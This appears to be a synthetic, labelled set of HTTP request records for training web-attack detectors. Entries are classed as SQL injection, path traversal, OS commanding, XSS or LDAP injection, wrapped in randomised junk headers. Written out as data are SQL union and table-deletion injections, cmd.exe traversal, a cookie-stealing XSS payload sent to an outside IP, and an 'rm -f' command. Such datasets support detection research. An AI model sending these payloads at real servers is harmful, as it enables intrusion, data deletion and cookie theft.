If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 7.8
Pragma: iar3d4st='Nkioue'
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: gopleT 27c7o=rerz30S
Range: -52,238-2637
Referer: http://lmel9.ch/ftg8o/msem7ou/dponoh/oaGmtle/t7oemoeb.asp
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 4.9; fn-EI; rv:5.5.5) Gecko/59020800
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: deflate
Upgrade: ttRtgh/5.0, upo/8.3, 1a4/1.5, lamere/3.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40534
Start - Id: 42654
class: SqlInjection
GET /laenbweba/oOIcaSs0zu/htyOs64tr3gUhttaqe/4htaccesX@0ascript5vIpassthruRF/oWKZ-Kmkcz/76TyejtToruhw/ejU3M2t0NmhLG_N4vw/sSTntsdHertrooe/tFqVOd9sXVCTabG/h.8.html?so=qwer%27++or++ooemxm9_v.Account%3D%27ezo9rtk%40dni.com&bchLteiesr=stepj3hwwe HTTP/1.1
Host: 61.15.85.20
Connection: close
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: compress, deflate;q=0.3
Accept-Language: Ip7-C, imed-iSotle;q=0.6, gs-kneta, b4-sia;q=0.6, 0-allr
Cache-Control: min-fresh=6
Client-ip: 183.138.44.237
Cookie: ds4h3mQF_zQand=fp9gxssenfin1ne;WR=]2ltChye et5;ollebekpieeofc=te(window.open;ldvnoaei8=382;ls=e;iI
Cookie2: $Version="9"
Date: Fri, 16 Jan 04 19:50:58 GMT
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Wed, 21 Jan 09 24:25:49 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 7892
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nc=df77Ceae
Range: -5
Referer: http://njerE.cz/tretm25/eigt/o5ao/Olore.js
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/2.0 (X11; U; Linux i386 6.7; dn-aa; rv:9.0.0) Gecko/39229825
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: ikne; sdrt4=tRlrnb2
Upgrade: fo6/1.0, ozs/3.7, re3mNl/0.5, osie/6.9
Warning: 589 203.56.73.253 "n545" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 593816636340415
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42654
Start - Id: 36157
class: PathTransversal
GET /nh@U2catL6h/susiCTcrdtNRpttrhhz/eCd.OaBt-rXptnCGr/oLeoeKGe/aDkBxwuWY94/XJcatiNOO/h.YT.js?i4rsteDasonc=ds&qfowrE0vE=igv&i2jeefmurI=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Flaelmerich%2Fastons%2Felol%2Fng.nsf&2ra=tAfDTnandh+T&fisusblhyznax6b=eig%3DrImoW&lhTpEOpedl=sMW HTTP/1.0
Host: www.slefeete.ch
Connection: keep-alive
Accept: application/x-tar, audio/basic, text/plain
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Date: Sun, 28 Feb 10 16:19:06 GMT
ETag: "u_8@O1_O@cim6wc3ZH"
From: rmee3leS@lenn.de
If-Modified-Since: Fri, 09 May 08 14:46:43 GMT
If-Unmodified-Since: Thu, 05 Apr 07 22:10:32 GMT
If-Match: "ElzUMg79vsWjlYT-UWa"
If-None-Match: *
Max-Forwards: 6366
Pragma: emug=edieona
Proxy-Authorization: Basic Nmk1OGlyOnNIb2VmZQ==
Authorization: iliern hB3cmbEy=jepqm
Referer: http://www.lPah.uk/coih.pl
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 6.6; Sr-at; rv:7.2.7) Gecko/75709589
UA-Color: color16
UA-Pixels: 5546x388
Via: 6ss/6.0 www.bccr.tiff
Transfer-Encoding: identity
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 11.225.138.134
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36157
Start - Id: 43963
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 246.99.234.3:4
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=1
Client-ip: 117.249.118.133
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Tue, 04 Apr 06 07:10:16 GMT
ETag: "KgvdimAZzmUx0@VVDP"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Thu, 08 Apr 10 24:10:30 UTC
If-Match: "UnnNgpU42QauRKxud"
If-None-Match: *
If-Range: "3bXCa8ykymYIGI.C1o"
Max-Forwards: 719
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: alau emmzb=s666e
Range: 97793-3,500796-0
Referer: http://slrmctee.biz/sstsfe/ie67sn/ee21brH/onof8edq/dabe.png
TE: deflate,deflate;q=0.5,gzip;q=0.8
Trailer: Referer
User-Agent: nE5j04jItT http://www.tICoeere.ch
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43963
Start - Id: 48232
class: XSS
PUT /ie2gaJHokOk5/felnee4tmentietuaLr/KKHaN9deleteZy/eDfq4.swf? HTTP/1.1
Content-Length: 217
Content-Language: omisgeer
Content-Encoding: deflate
Content-Location: /haersDn.sh
Content-MD5: dHAycnJDZGVzdmJXMjZybQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Mar 07 16:38:32 CET
Last-Modified: Tue, 23 Sep 08 06:15:19 CET
Host: www.etNu.biz
Connection: keep-alive
Accept: application/x-tar;q=0.0
Accept-Charset: iso-10646-ucs-2, windows-1250;q=0.8, cp-936
Accept-Encoding: gzip, identity;q=0.8, compress, deflate;q=0.8, compress
Accept-Language: O8nmM-Rmuykklr;q=0.6, afd-1NO87ia, Eraacsh-Utdnf;q=0.5
Cache-Control: max-age=069
Client-ip: 170.22.1.14
Cookie: phcsoa=m0l :netcataimunionbeiaj6b;TyxpJD96W=okH5LaWIoucT;xtbiiqehqy7elap=<div   style    = " binding:    url([http://www.esarries.com/script/bTt4g.jsp]);    "  >;rmai0itodfD=55
Cookie2: $Version="830"
Date: Sat, 28 Oct 06 05:06:07 CET
ETag: W/"K1TQ--K12uVKwS1AQ"
Expect: edjep=watar;Oneanh
From: SPnoemq6@oee6gw4s.com
If-Modified-Since: Tue, 27 Mar 07 11:48:25 GMT
If-Unmodified-Since: Sat, 20 Nov 04 14:45:03 UTC
If-Match: *
If-None-Match: "X94cLYvnHhf_sf-VtrGE"
If-Range: Thu, 08 Apr 04 11:03:37 UTC
Max-Forwards: 5333
MIME-Version: 7.2
Pragma: tot='gso6daup'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: saCsr 4smMx6=1i3tZ39
Range: 2-22075
Referer: http://ap89.st/epie/ft3s/orrhr/tvDd/nlnvseoA.fgf
TE: trailers,trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 7.5; Ea-ra; rv:5.8.8) Gecko/16822664
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 467x7799
Via: 9.5 59.44.235.74:86405
Transfer-Encoding: compress
Upgrade: Eoge/5.5, mmGS/2.1, smtts/9.5
Warning: 709 39.76.243.65:436 "eant" 
X-Serial-Number: 60545098
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nokos=69&UBo0q83nbS=590&passthru0azPnullI1mRydZ=tzXsB.ys2ur&7lx5fTsPo= smrscateaItnt/8d&ahiwas5eogwetYq=|&jetANt=hBtsaptaai9o&Sna6ti=m?htalth-?uHpasswdu&a20Q=9188808&aAcawlbsnca=keEimvoei&BstftA4rjsnr=tIaNVBVb

End - Id: 48232
Start - Id: 43915
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.eYliaH.biz
Connection: eIoa
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lcnlrGm9-ho, iqem-tfftttmx, oct3-eaoses;q=0.4
Cache-Control: no-store
Client-ip: 134.255.20.254
Cookie: C4id5ehttps=[? p;Wseu=logatzloghttpsrs rrahoilm s;issm1h5g=hze?s;ymseepai6efrmae=seo;pntspre2cRkggen=0539052709
Cookie2: $Version="44"
Date: Wed, 20 Jun 07 13:32:31 UTC
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Sun, 01 Oct 06 20:35:12 UTC
If-Unmodified-Since: Wed, 16 Jan 08 24:42:32 CET
If-Match: *
If-None-Match: "s_elzsq_CrI0TpYbO"
If-Range: *
Max-Forwards: 849
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic dHRsYXM6bDJyZHJlY0w=
Range: 6652-,-36477,66590-93
Referer: /ceitt/P4yenule/eitiad/iuhfOo.gif
TE: trailers,chunked;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/6.0 (Windows; U; WinNT 0.6; Tm-6E; rv:0.9.0) Gecko/87615270
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/6.4 30.69.208.49:1143, HTTP/8.0 142.51.63.146
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43915
Start - Id: 41590
class: SqlInjection
GET /aapwds77iimoa/emieuutpgcsaipente/sthlo/tsJoIyKi7uzxiCo/moo@IbFxRZv5PCh0/hemnq/ez0Rw5a93OR3/7nclrtr/r0S6iyeA6tpoOas.html?enoevreur=%27++%29+UN%2F**%2FION++++ALL+++SEL%2F**%2FECT+++++%27eeuryt%27%2C1%2C00730%2C%270sse%27%2C9++++FROM+denRenemw+WHERE++++%28++++%27%27++%3D%27&ycrnnde=8526&dRiq=eaur8lpoaoae8 HTTP/1.0
Host: 136.78.82.241
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 54.50.243.201
Cookie: eo=i2P-UuvC_H
Cookie2: $Version="52"
Date: Fri, 25 Sep 09 12:33:50 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Wed, 25 Mar 09 19:18:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 16 May 09 10:03:13 GMT
Max-Forwards: 1
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: setyft ncadaa=lsid
Authorization: Basic aW5vZHRsOW06ejR1b2Vl
Range: 7594-
Referer: http://www.w9tpaSqr.net/3hlEtne/iewl/HeeEth/hcese.bin
TE: trailers
Trailer: If-Range
User-Agent: f1z4O- http://www.tcva65p.org
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3931x2579
Via: 1.6 103.244.78.247
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41590
Start - Id: 38081
class: LdapInjection
GET /o1ptfensto9a/cieszTs8of/eUqNDTiw4-PWB/iOG0p/eaqhnwa/ajowpzSkUKIr6CCi/slNEnqqAV.asmx?8QHbp=ckadeleteh&adb4cfohe4=3153681938&cBjNtt0=rwdr&deleqjc4ges8sh=d+ulr48or&nnttn8anlnena=secda%3Bvqsi+a&oadxs=llocation&EEogiK3=-deleteiclege&sosa=1520%29%28%26%28objectClass%3Duqc%29%28%7C%28sn+++%3DAo%29%28cn%3Drsu+J*%29%29&wi2=il%3AteuD&hbifzime37h7=eksnsh&tmtAu=taoeezhmo+zN%3Byt&deestwepaeseooa=415&4TdK-1h4NPrl=rcnmefwnLro&tiwt=elIjlsrte&hdtNo=s%5C HTTP/1.0
Host: www.t5Ttt.com
Connection: amhhtye
Accept: text/*;q=0.6, application/postscript, text/*;q=0.3
Accept-Charset: iso-8859-4, utf-7
Accept-Encoding: identity, gzip;q=0.5
Accept-Language: oet-obieht;q=0.9, rnveeoc-ece
Cache-Control: max-stale=2
Client-ip: 111.152.191.252
Cookie: hgg=aaiUu;decho;xuaeosxisfuhO=4pieoneo;7gricLasaytteu=oxesr7ihaanaanmD5;d8aigye5ia2soe=held
Cookie2: $Version="085"
Date: Fri, 25 Feb 05 21:56:46 CET
ETag: W/"1s263QBa9NDGRHxL"
Expect: 100-continue
From: 6boleoo@ai5nodlHti.be
If-Modified-Since: Wed, 05 Oct 05 16:11:34 CET
If-Unmodified-Since: Wed, 27 Dec 06 09:34:02 CET
If-Match: "F8_XYkqmanryTG2ySEc"
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
If-Range: Sun, 15 Mar 09 02:41:06 CET
Max-Forwards: 7
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
Authorization: Digest realm
Range: 77-,76-
Referer: http://C2aeel72.be/ster3oiP/n8aLnqe/sgo5u0.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.6 (X11; U; Linux i586 8.4; in-th; rv:9.9.9) Gecko/14331527
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.3 www.gpntn.shtml
Transfer-Encoding: identity
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 67.89.141.76
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38081
Start - Id: 47486
class: XSS
GET /Ae3aucei/eI74rdS6x3lBCa/e@N8tiO_.NogJQW8fTt.cgi?aedljtosits=necho&AdT=%7Csneo%7ErwOhz3%3D6m&eWh=57&etEsoiahdmbe=t55r&d6osdaeeeaAo=%3Cimg+src++%3D++++%22++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F115.64.163.145%2Fchlaie.swf%27%2Bdocument.cookie%29%3B%5D++++++++++%22%3E&xmlU6sSFKWL=38213&Pstwes2nit1itbd=dOtn%2Bij7Icc&TJFcC5Np3DTR=4&c0n1Imep=7280084001&T9dswas=724249&nhhunNeN=3Xq&9cnhzen=ltnyeuac4fn&Rgte=h1ANHTw8EC4r&cerizTiqu1dc=euSncjdnnmbwett HTTP/1.1
Host: 68.102.103.176
Connection: rdxnt
Accept: video/*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.9, deflate;q=0.9, identity, compress
Accept-Language: *;q=0.3
Cache-Control: max-age=93
Client-ip: 66.213.204.241
Cookie: ila6et=938741532
Cookie2: $Version="376"
Date: Tue, 06 Jul 04 15:58:44 CET
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 08 Nov 04 09:26:04 CET
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: *
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Fri, 19 Jun 09 10:03:58 GMT
Max-Forwards: 1
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: /elts2a5t.jpg
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: y0ni6slfheolbiezrshe
UA-CPU: x86
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47486
Start - Id: 44013
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 69.184.150.133:80
Connection: 5seoe
Accept: video/*;q=0.1, image/*
Accept-Charset: x-mac-arabic, ks_c_5601-1987, utf-8, ks_c_5601-1987, iso-8859-7;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: Mt-t
Cache-Control: tpOvedrc=gdrkeu
Client-ip: 17.39.141.125
Cookie: fdigshrpRUt=|oeno2erxssrtid
Cookie2: $Version="10"
Date: Thu, 08 Apr 10 24:33:22 GMT
ETag: W/"onnOX1HUYGEaA@7"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 13 May 08 08:05:19 UTC
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: ".Hr3xBKrsAJ76r40zW"
If-None-Match: "ZxAz0m_fOcyu_No6"
If-Range: *
Max-Forwards: 254
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: /ntuysZen.php3
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Mozilla/3.0 (compatible; mir8h; WinNT; znin6; ibqi1y; nhsdse)
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: teCooo; eage=cepcnecr
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44013
Start - Id: 41224
class: SqlInjection
GET /T5b/nleoN0e/ts24-TeyfopR1Gur.hVF/nn2ytesteoss/B.0xmlW17hlogE/j2afhx99u2aa/opGHYHZspNAt6@9mDwI.js?dggtvnosim=engerdlIew8&lmel=9389&gs2asw0a=dstqindau&eawapr=I&N.hvvG2exec=iVRl-f&v6jetmcfs9HVg=i%3B&qyhrsvt=ciy&unionA3k@4telnetO=%2B HTTP/1.1
Host: 239.47.89.163
Connection: keep-alive
Accept: video/*;q=0.5, image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: oaarx-bEeiig
Cache-Control: max-age=9143
Client-ip: 206.238.177.255
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="8"
Date: Mon, 20 Sep 04 16:23:30 UTC
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 100-continue
From: eoinuyii@2ot3t.net
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Nov 04 05:46:15 GMT
Max-Forwards: 82
Pragma: osst=i
Authorization: Digest nc=Cf6ef5A0
Referer: /fsh4t/ohrt5.bin
TE: trailers,chunked,trailers
User-Agent: '    OR   'htimoJ' =    '    
UA-CPU: 68000
UA-Color: color32
Via: HTTP/8.0 70.155.117.52
Transfer-Encoding: deflate
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 54822756786329442
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41224
Start - Id: 41969
class: SqlInjection
GET /lkCKXZAUphp-/moJey3ipr2abn2snh/ytnhaSi8ttvaezhonttt/4grsi5oojlonatlUni/yhtacces-CAwYc23RG/oaaGLaNeEereis/Ekq3L8_BcUahvuK/1jrHH0ALincludese7v9/g2dyN.roJfT6ZEtJG1vZ/eqthnsyce.cfm?annalsb6genhm=vFhzQ26RAMR&tI03e=15&7rd=wcCpJGUoh31&eocqFphiTen=coAiphp%253%25anErt5dOo&htacces7Hdelete1h.g=gx&bounioiaoo=%27++%29%3B+++delete+++++from+++users%3B++commit%3B+++++dummy%28++++%27 HTTP/1.0
Host: www.AreT.st:9617
Connection: close
Accept: image/png, image/gif, application/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 124.187.36.33
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="717"
Date: Fri, 14 Nov 08 14:38:13 CET
ETag: "sVe4cTNh_tT9Of5"
Expect: 100-continue
From: euneqp1n@rbn2rczmu.com
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 51
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: awzeh4 1EetAatb=raaaa9e
Authorization: NTLM b2lnZ3NvZWhlb2ViSG1sejFuNmd2b2tEZU5zaldha29lcjJtYWVweWhpOHNhOUVs
Range: 991-40833,238399-36
Referer: /z78xi5gi/kelbg/dasnlt.sh
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: vyhm7res
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: seQnm/8.6 81.43.123.224, HTTP/9.0 www.n2esy.tiff:2710
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41969
Start - Id: 38542
class: LdapInjection
GET /w9_g5.P4/sXV.e5w6b/vtm0htesot/CN4Zk0ofF/GlikeTsxp_5Vdocument/ywdd8aasld8aqetd/yand3hztPqf0sXe/nouuheet/-.gnhHhttplinkrhome9N_T/utyfs5/dotithknlmaj/sME9S@sS9iqd.php3?hobr0lcdyn=44&raa1dpr=558209&noaibev8eio7c=tRoesi&acus2nsc=Ci%29%28%26%28objectClass++%3Dzda4*%29&etutarsrmls=7&shlew=8anRernwskqcbao6&nIn=ptxevio&1Etmtc5pAhaebV=osyctelnetorm%26srp%40Vs&werauhntgiS=eSG HTTP/1.1
Host: www.oNacd.st
Connection: O8Eadts
Accept: audio/*;q=0.1, application/postscript, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ho-0dtee8h, da0u4a-lebneb9h, te-i;q=0.3
Cache-Control: only-if-cached
Client-ip: 231.118.216.145
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="4"
Date: Wed, 05 Apr 06 04:14:21 GMT
ETag: W/"LzfgK5k748beRBr_"
Expect: yyiraR
From: eTmmd@usijk.cz
If-Modified-Since: Mon, 04 Oct 04 24:01:58 CET
If-Unmodified-Since: Sat, 03 Sep 05 20:42:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 02:27:49 GMT
Max-Forwards: 8305
MIME-Version: 3.2
Pragma: ov07eii='aehosrn'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest nc=938d1cd7
Range: 447-,158917-
Referer: /pt90e/cohX/lg3v.msf
TE: trailers,trailers
Trailer: If-Range
User-Agent: umWkUsbgf http://www.l8Dps.it
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8726x4401
Via: 2.3 157.122.93.120
Transfer-Encoding: deflate
Upgrade: hhO/0.0, tqa0d/3.1
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38542
Start - Id: 46510
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: 9.83.223.208
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-2, x-mac-turkish
Accept-Encoding: 
Accept-Language: oeeham-7, eg-r
Cache-Control: no-store
Client-ip: 217.88.94.178
Cookie: rtciixv5oC=0380670585;atnb=nvajinhfoSxazs
Cookie2: $Version="1"
Date: Tue, 23 Feb 10 23:25:09 UTC
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 79eAowab=traDe;e6adti
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: "g@zoOKua_F@PiN9D"
If-Range: Tue, 01 Jan 08 15:13:28 CET
Max-Forwards: 576
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: 8817-695585,1-
Referer: /wHnY/TNneamwi/tdtnEtea/rcier/m5a08nxo.jpeg
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: ippFOcA http://www.uusT6i.net
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 5.3 2.153.93.218, 8.0 www.eiba.htm:62
Transfer-Encoding: gzip
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 270 www.Taaaeh.shtml "aOxgliirnstyeOIeo6rn" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46510
Start - Id: 42914
class: OsCommanding
GET /cqD/sfn3ehe/bzdDfOnL1rDw8TuGlK@/nlhh1otIBodvrronuon/3q/7mreppAta/bNhdfSsock_streamo@dm/m4DLNuhlE2wv/nv0/TlcOfojta7zhqjgrc.asp?mqa=iHadrhtaccesuatmswao&alldDZE9lp=rexecSersmdyfjas&0ah=stdinh&Y12UpasswdEfz5Vs=lmtidsah%5DeoarOehdivie&walowhe=nwtngrr0nto&aeh3ljccneda=uns0%3A0nabiopenV+e&r4thli=463012929 HTTP/1.1
Host: 165.170.90.134
Connection: Pnrt2klu
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.5
Accept-Language: rm  -f    /tmp/h   |
Date: Mon, 27 Oct 08 21:14:20 UTC
If-Range: Thu, 16 Jun 05 14:19:35 CET
